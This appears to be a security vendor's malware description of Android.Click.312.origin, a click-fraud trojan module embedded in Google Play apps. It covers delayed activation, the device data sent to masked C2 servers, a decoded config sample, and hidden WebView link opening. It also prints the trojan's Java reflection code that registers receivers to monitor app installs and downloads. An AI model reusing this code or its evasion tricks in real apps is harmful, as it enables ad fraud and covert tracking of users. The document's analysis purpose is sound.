Android.Click.312.origin

Android.Click.312.origin is a trojan module that can be embedded in Android applications by developers. It was first found in software distributed on Google Play. So as not to raise suspicion, the module starts working only 8 hours after launching in programs containing it.

We also know modifications of this trojan, such as Android.Click.313.origin.

After startup, Android.Click.312.origin connects to the command and control server at https://alb.bear****.com/service/find?token=, and sends it a POST request with the following information about the mobile device:

• manufacturer and model;
• operating system version;
• user’s country of residence and the default system language;
• User-Agent identifier;
• mobile carrier;
• Internet connection type;
• display parameters;
• time zone;
• data on the application containing trojan.

In response, the trojan receives certain settings. See below the example:

{
"da": [
{
"eb_167": {
"fa": 4133,
"fb": 5005,
"fc": [
{
"ga": 4449,
"aa": "",
"ab": "",
"ac": "1",
"ad": "1",
"ae": "1",
"af": "1",
"ag": "1",
"ah": "1",
"bj": "AA8FEw4IBU8CDg8VBA8VTyMTDgAFAgASFTMEAgQIFwQT", //
"android.content.BroadcastReceiver"
"ba": "EwQGCBIVBBMzBAIECBcEEw==", // "registerReceiver"
"bb": "AA8FEw4IBU8IDxUEDxVPAAIVCA4PTzEgIiogJiQ+ICUlJCU=", //
"android.intent.action.PACKAGE_ADDED"
"bc": "EQACCgAGBA==", // "package"
"bd": "EwQGCBIVBBMiDg8VBA8VLgMSBBMXBBM=", // "registerContentObserver"
"be": "Ag4PFQQPFVtOTgUOFg8NDgAFEg==", // "content://downloads"
"bf": "EBQEExg=", // "query"
"bg": "Ag4PFQQPFVtOTgUOFg8NDgAFEk4RFAMNCAI+BQ4WDw0OAAUSTg==", //
"content://downloads/public_downloads/"
"bh": "AA8FEw4IBU8FABUAAwASBE8iDg8VBA8VLgMSBBMXBBM=", //
"android.database.ContentObserver"
"bi": "AA8FEw4IBU8PBBVPNBMI", // "android.net.Uri"
"bv": "Ag4MTwAPBRMOCAVPFwQPBQgPBk8oLzI1IC0tPjMkJyQzMyQz", //
"com.android.vending.INSTALL_REFERRER"
"bu": "EgQPBSMTDgAFAgASFQ==", // "sendBroadcast"
"bk": "AA8FEw4IBU8CDg8VBA8VTygPFQQPFScIDRUEEw==", // "android.content.IntentFilter"
"bl": "AA8FEw4IBU8CDg8VBA8VTyIODxUEGRU=", // "android.content.Context"
"bm": "AAUFIAIVCA4P", // "addAction"
"bn": "AAUFJQAVADICCQQMBA==", // "addDataScheme"
"bo": "AA8FEw4IBU8CDg8VBA8VTygPFQQPFQ==", // "android.content.Intent"
"bp": "EgQVIAIVCA4P", // "setAction"
Config example
Expand
source
 "bq": "EgQVMQACCgAGBA==", // "setPackage"
"br": "EgQVJw0ABhI=", // "setFlags"
"bs": "ERQVJBkVEwA=", // "putExtra"
"bt": "EwQHBBMTBBM=", // "referrer"
"wa": "1",
"ccl": "41C2B18562FD214249F03464D37649C7", // "20"
"bw": "D7F2C05AB2907B2C482619385C680FA73821062F2A2B55F36650478C6CA74F68", //
"unregisterReceiver"
"bx": "B6AEAB1DECBFF6A631E3D801E5D0D1E9D700630581E1DA2E7CB145C4CF0D6296", //
"unregisterContentObserver"
"by": "685016505AA49714487A44282E5E7F0F", // "getData"
"bz": "DF52208D68AA2DA7EC3ED2071CC2D5FF5809F7419409F3DA6B135E829B8D748C", //
"getSchemeSpecificPart"
"cca": "09BC5F0AC4B69BC951614AC6B5C9B22A", // "getPathSegments"
"ccb": "5DF882205437BB8B994E3BA129EC4643BAFB835F72C85714E5A8EE859ABDEABC", //
"android.database.Cursor"
"ccc": "DF1FF1B64CF8D85CB878B425DC302D4290CE6A7FB993F4DEE7570F8B4C4D416A", //
"android.content.ContentResolver"
"ccd": "64E9CFE7A1BB7433868B1894A10627C44A51E307ECEB3BD64B4C95B17E8CE182", //
"getContentResolver"
"cce": "05C1DA5A31206511F814ED050F5093A3", // "getColumnCount"
"ccf": "FDFC66B16AE1B2CCAE559A8A8A154A43", // "getString"
"ccg": "083CA19C22F977BBDA934BC0CE405347CD8597846A883708696EA171C27A3684", //
"getQueryParameter"
"cch": "E5FC801DE5B47F1E30E186AB1B341E624078658D4ECDF881606C578BC31771F3", //
"com.android.vending"
"cci": "DB394C3B23DA2B87506E0EE2284039D7", // "packageName"
"ccj": "31D99ECD8BA695CDD77708777758651D", // "9"
"cck": "870B6D3167238D14F962D0E974363436" // "15"
}
]
},
"eb_89": {
"fc": []
},
"ea": "Bear_data_2.3.8"
}
],
"db": {
"ha": 1,
"hb": "Oj49Pzw+Pz09ODkyOQ==",
"hc": 0,
"hd": 600,
"he": 100,
"hf": "RU",
 "hg": 0
}
}

Some functions of the malicious app are implemented using reflection. The names of classes and methods, as well as the parameters for them, are specified in the settings the trojan receives. The parameters are used, among other things, to register a receiver of broadcast messages (BroadcastReceiver) and a content observer (ContentObserver), which Android.Click.312.origin uses to monitor the installation and updates of programs.

The snippet of the trojan’s code that registers BroadcastReceiver and ContentObserver:

public static void registerReceiver(Context context, String registerReceiverString, String dataScheme, String
action, BroadcastReceiver broadcastReceiver) {
try {
if(!TextUtils.isEmpty(registerReceiverString) && !TextUtils.isEmpty(dataScheme) &&
!TextUtils.isEmpty(action) && broadcastReceiver != null) {
Config config = BearConfig.getInstance().getConfig();
Class contextClass = Class.forName(config.getContextClassName());
Class broadcastReceiverClass = Class.forName(config.getBroadcastReceiverClassName());
Class intentFilterClass = Class.forName(config.getIntentReceiverClassName());
Method registerReceiverMethod = ReflectionUtils.getMethod(contextClass, registerReceiverString, new
Class[]{broadcastReceiverClass, intentFilterClass});
Object intentFilter = intentFilterClass.newInstance();
Method addActionMethod = ReflectionUtils.getMethod(intentFilterClass,
config.getAddActionMethodName(), new Class[]{String.class});
if(addActionMethod != null) {
addActionMethod.invoke(intentFilter, action);
}
Method addDataSchemeMethod = ReflectionUtils.getMethod(intentFilterClass,
config.getAddDataSchemeMethodName(), new Class[]{String.class});
if(addDataSchemeMethod != null) {
addDataSchemeMethod.invoke(intentFilter, dataScheme);
}
if(registerReceiverMethod != null) {
registerReceiverMethod.invoke(context, broadcastReceiver, intentFilter);
}
}
}
catch(Exception unused_ex) {
}
}
public static void registerContentObserver(Context context, String uri, String registerContentObserverString,
ContentObserver contentObserver) {
try {
if(!TextUtils.isEmpty(uri) && !TextUtils.isEmpty(registerContentObserverString) && contentObserver !=
null) {
Config config = BearConfig.getInstance().getConfig();
Method registerContentObserverMethod =
ReflectionUtils.getMethod(Class.forName(context.getContentResolver().getClass().getName()),
registerContentObserverString, new Class[]{Class.forName(config.getUriClassName()), Boolean.TYPE,
Class.forName(config.getContentObserverClassName())});
if(registerContentObserverMethod != null) {
registerContentObserverMethod.invoke(context.getContentResolver(), Uri.parse(uri),
Boolean.valueOf(true), contentObserver);
}
}
}
catch(Exception unused_ex) {
}
}

The trojan BroadcastReceiver monitors the installation and updates of applications, while ContentObserver monitors the downloading of APK files by the Play Store client process. Upon detecting one of these events, Android.Click.312.origin calls the server at https://aly.bear****.com/es/apcfg?funid=1 and sends it a POST request with the following data:

• name of the installed or downloaded software package;
• application version;
• MD5 value of the APK file;
• first installation time;
• data on the user’s country of residence;
• system language and the time zone.

In response, the trojan receives tasks with links. At the server’s command, Android.Click.312.origin can follow these links and open them in an invisible WebView. It can also open websites in a browser, as well as open Google Play links.

Applications that were found to contain the trojan:

News about the trojan